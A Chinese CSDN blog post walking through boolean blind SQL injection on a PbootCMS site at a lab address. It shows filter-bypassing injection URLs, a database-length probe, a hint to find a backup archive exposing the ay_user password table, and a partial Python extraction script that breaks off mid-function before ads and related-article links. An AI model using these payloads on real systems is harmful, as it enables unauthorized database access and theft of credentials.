2024年网络安全最新pbootcms网站实战攻略_pbootcms 乘法

最新推荐文章于 2024-10-18 09:32:17 发布
最新推荐文章于 2024-10-18 09:32:17 发布
阅读量210 收藏 4
点赞数 8
分类专栏: 程序员 文章标签: web安全 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84297455/article/details/138381082
版权

判断注入语句为:‘) and 1=1#和’) and 1=2# 观察页面返回,由于页面作了空格和“=”符号的过滤,使用%09取代空格符号和%3d取代“=”

使用 
http://10.10.5.79:8088/?case/14%27)%09and%091%3d1%23.html%09and%091%3d1%23.html")

代替  
http://10.10.5.79:8088/?case/14’) and 1 = 1.html and 1 = 1.html")  来判断注入点

访问  
http://10.10.5.79:8088/?case/14%27)")
%09and%091%3d2%23.html

判断数据库长度,使用length()函数,构造语句:
http://10.10.5.79:8088/?case/14
%27)%09and%09length(database())%3d1%23.html%09and%09length(database())%3d1%23.html"),

当等于1时返回空,将数据改为8,返回正常,说明数据库的长度为8

开始修改bool.py脚本,在脚本内容中修改参数,利用构造的盲注语句修改脚本中的语句

这里根据提示,用御剑扫描网站后台,有一个.zip后缀名的数据包,访问后发现数据库文件,找到存储password的表文件为’ay_user’,这里更改content内容表内容,直接跑出content结果。

这里附上Python脚本源码:

import requests
import string

class GetInject:
    chr_str = string.ascii_lowercase + string.punctuation + string.digits 
    def __init__(self,url,mark,obj):
        '''
        obj参数举例:
        obj = "database()"
        obj = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
        '''
        self.url = url
        self.mark = mark
        self.obj = obj
    
    def get_length(self):
        payload_len = "14')%09and%09length({0})%3d{1}%23.html"
        #如果实例参数是双引号型或者整数型,修改payload格式
        i = 1
        while True:
            payload_len_i = payload_len.format(self.obj,i)
            r = requests.get(self.url+payload_len_i)
            if self.mark in r.text:
                print("len",i)
                return i
            i += 1

    def get_name(self):


### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84297455
关注
专栏目录
mul.rar_乘法器_乘法器 vhdl
09-20
乘法器VHDL程序详解》 在数字电路设计领域,乘法器是一种至关重要的元件,它能够实现两个二进制数的相乘运算。本文将深入探讨VHDL(Very High Speed Integrated Circuit Hardware Description Language)编程环境...
PbootCMS程序安全设置建议
wwwwestcn的博客
08-28 818
3、在虚拟主机控制面板,点击 目录保护,依次 将 /static 、/skin 、/template 、/uploads 、/apps 、/runtime 设置文件保护;3、修改 /data 目录名称,修改为其他名称,比如 daj4oy7fd , 然后修改配置文件 /config/database.php 的数据库路径为刚刚修改的名称。2、然后通过文件管理,依次将 /data (新名字) 、/runtime 、 /static 、/config 、/uploads ,目录设置为 可读可写;
CTFHUB《Web-信息泄露-备份文件下载》网站源码,
weixin_45694388的博客
11-11 1381
三种方法: 方法一:dirsearch扫描git泄露 有文件下载 拿到flag 方法二:御剑(超时10s) 御剑其实也可以扫出来,但是一般我们扫域名超时时间都是三秒,本环境中需要超时10秒才能得到 方法三:burp根据已知字典扫 参考: https://www.cnblogs.com/carr0t/p/websitesource.html ...
pbootcms基本使用教程
m0_62969356的博客
09-27 253
手机QQ授权码获取地址:http://m.q.qq.com/a/s/5e5a1c50fcdfd99ca3a5058007b87bc5。1、上传到自己的主机,输入域名打开,会出现授权的页面,直接到pbootcms的官网进行授权(免费)。电脑版授权码获取地址:https://www.pbootcms.com/freesn/2、登录后台,登录方式:你的域名/admin.php。如果出现首页打开404,也先到后台填写授权码,6、模板路径:有些文字在模板上修改。5、伪静态问题,请参考:《
Pbootcms安全设置防护教程(再也不怕被黑了)
PHP错误汇总
06-16 973
PbootCMS作为国内最具人气的免费可商用的CMS程序,备受广大建站用户喜爱,我们在使用Pbootcms时,也忽视了一些安全防护设置,这样会导致系统安全系数降低,被黑或者被注入的概率极高,毕竟这世界百分百存在着极多的无聊hacker对全网的网站进行扫描,扫到你这个菜站,尤其是主流的CMS,所以在开发前做好安全防范还是很有必要的!
pbootcms系统安全防护设置大全
青茶
08-22 1191
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。系统采用简单到想哭的模板标签,只要懂HTML就可快速开发企业网站。官方提供了大量网站模板免费下载和使用,将致力于为广大开发者和企业提供最佳的网站开发建设解决方案。
PbootCMS微信小程序API的封装使用教程
玲鲲科技的博客
04-13 2082
PbootCMS微信小程序API的封装使用教程 原文网址:https://www.lkcms.top/rgcms/58.html 第一步:准备md5加密文件 PbootCMS的签名参数signature是经过双层md5加密的,当然如果后台WebAPI没有开启强制认证的,这一步可以跳过。 第二步:封装API请求方法 function api_request(url, method, parm){ ...
PyroCMS: 一个强大的开源PHP CMS平台
gitblog_00002的博客
03-11 400
PyroCMS: 一个强大的开源PHP CMS平台 pyrocms Pyro is an experienced and powerful Laravel PHP CMS. 项目地址: https://gitcode.com/gh_mirrors/py/pyroc...
基于PbootCMS搭建个人网站
m0_67297118的博客
08-06 1773
在本地电脑浏览器地址栏中输入http://,测试Apache服务是否安装成功。6.执行命令修改MySQL数据库的初始密码(注意初始的密码策略要求修改密码必须同时包含大小写英文字母、数字和特殊符号中的三类字符)记住修改后的密码就行 到这里你的网站就可以使用公网ip进行访问了 浏览器输入http://公网IP。登录后台页面 http://公网ip/admin.php。
ComplexMult.rar_ ComplexMult_FPGA复数乘法_乘法_复数fpga_复数乘法
07-15
复数乘法在数字信号处理、通信系统以及射频应用等领域有着广泛的应用。FPGA(Field Programmable Gate Array)作为一种可编程逻辑器件,能够高效地实现这类计算任务。本项目"ComplexMult.rar"集中探讨了如何在FPGA上...
mulbinarytree.zip_16位乘法器_VHDL 乘法器_乘法_乘法 vhdl_乘法
07-15
16位二叉树乘法器(阵列乘法器),VHDL实现
实战训练6 16位乘法器芯片设计_乘法器_fpga_
10-03
实战训练的主题是设计一个16位的乘法器芯片,这是一项核心的数字逻辑设计任务,因为它在各种计算和数据处理应用中都起着关键作用。 1. **乘法器的基本原理**: 乘法器是数字电路中的基本组件,用于执行两个二...
juzhenchengfa.rar_快速 乘法_矩阵乘法 快速
09-14
在计算机科学领域,矩阵乘法是一项基础且重要的计算任务,特别是在图形学、机器学习、线性代数等众多领域有着广泛应用。"快速乘法"和"矩阵乘法_快速"这两个标签暗示了我们讨论的主题是关于提高矩阵乘法效率的算法。...
pbootcms基本使用方法,搭建教程
m0_55416028的博客
12-27 2674
1、上传到自己的主机,输入域名打开,会出现授权的页面,直接到pbootcms的官网进行授权(免费)。2、登录后台,登录方式:你的域名/admin.php。5、伪静态问题,请参考:我往期的文章,讲解的很详细;4、站点信息里改成自己当前使用的域名。6、模板路径:有些文字在模板上修改。点击pbootcms官网进入网站
Pbootcms网站安全设置教程
goodung的博客
04-19 848
比如改成 xin-user.php 那么新的后台入口就是 www.yunbuluo.net/xin-user.php (将该文件admin修改成任意文件名,5、删掉根目录中的网站备份压缩文件有很多用户喜欢直接上传压缩文件到根目录,但是解压完之后为了方便也不删除。进入后台,系统管理-数据库管理找到数据库管理,点击备份,将网站备份并下载本地保存。登录后台之后点击右上角,然后点击密码修改,本站Pbootcms模板默认密码为。通过后台升级,检查更新最新版本,或者通过文件覆盖升级,去官网下载最新版本将。
PbootCMS被入侵篡改,应该如何加固pbootcms站点
魅宝网络
10-16 876
大家好,我们是安阳市魅宝网络科技有限公司。今天我带来了一条重要消息,可能对很多使用PbootCMS建站的朋友来说是个不小的震动——PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要,不法分子总能通过漏洞进行入侵篡改!
保护你的网站:pbootcms漏洞修复详解
奇妙的Bug之旅
01-14 2052
通过升级pbootcms版本、修复已知漏洞、加强用户认证、输入验证和过滤以及安全数据库操作,我们可以大大提高pbootcms系统的安全性。然而,安全是一个动态过程,我们应该时刻保持警惕并跟踪最新安全漏洞和修复方法。同时,我们还应该过滤用户输入,以删除潜在的恶意代码。首先,我们需要确保我们使用的pbootcms版本是最新的。漏洞通常是通过已知的软件漏洞进行攻击的。因此,通过升级到最新版本,我们可以避免已知漏洞的风险。数据库操作是一个网站的核心功能,同时也是最容易受到注入攻击的地方之一。
pbootcms怎样做好网站安全
最新发布
xundang的博客
10-18 300
更改敏感文件夹名称:将默认的敏感文件夹(如data)重命名,并在相关配置文件中更新路径,增加黑客攻击的难度。配置robots.txt:在robots.txt文件中添加规则,禁止搜索引擎爬取敏感路径,降低被攻击的风险。安装安全插件:使用PbootCMS安全插件或模块,如防SQL注入、XSS攻击等,增强网站安全性。安装防火墙软件:对于独立服务器或VPS,可以安装防火墙软件,如安全狗、D盾等,来防御外部攻击。只读权限设置:将网站根目录下的部分文件夹设置为只读权限,以减少被篡改的风险。
PbootCMS开发版
weixin_45827872的博客
05-13 1151
PbootCMS开发版是一个单独的可商用版本,增加实用功能及修复安全问题并保持正常更新。加入茶话社,不仅可以使用开发版vip版,同时赠送多套原创模板及N套全网模板,提供建站技术支持,同时还有额外福利。 仅限自用,如发现私自对外发布或者倒卖,直接踢出群并且不提供后续更新!欢迎举报私发者,我们将对举报人严格保密并提供适当奖励。禁止用于非法行业,违者自行承担责任。 重要通知:开发版没有授权本站以外的人员进行售卖,各种群里面标注售卖开发版的均为骗子,我们将保留追究法律责任的权利。开发版唯一作者QQ702688.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值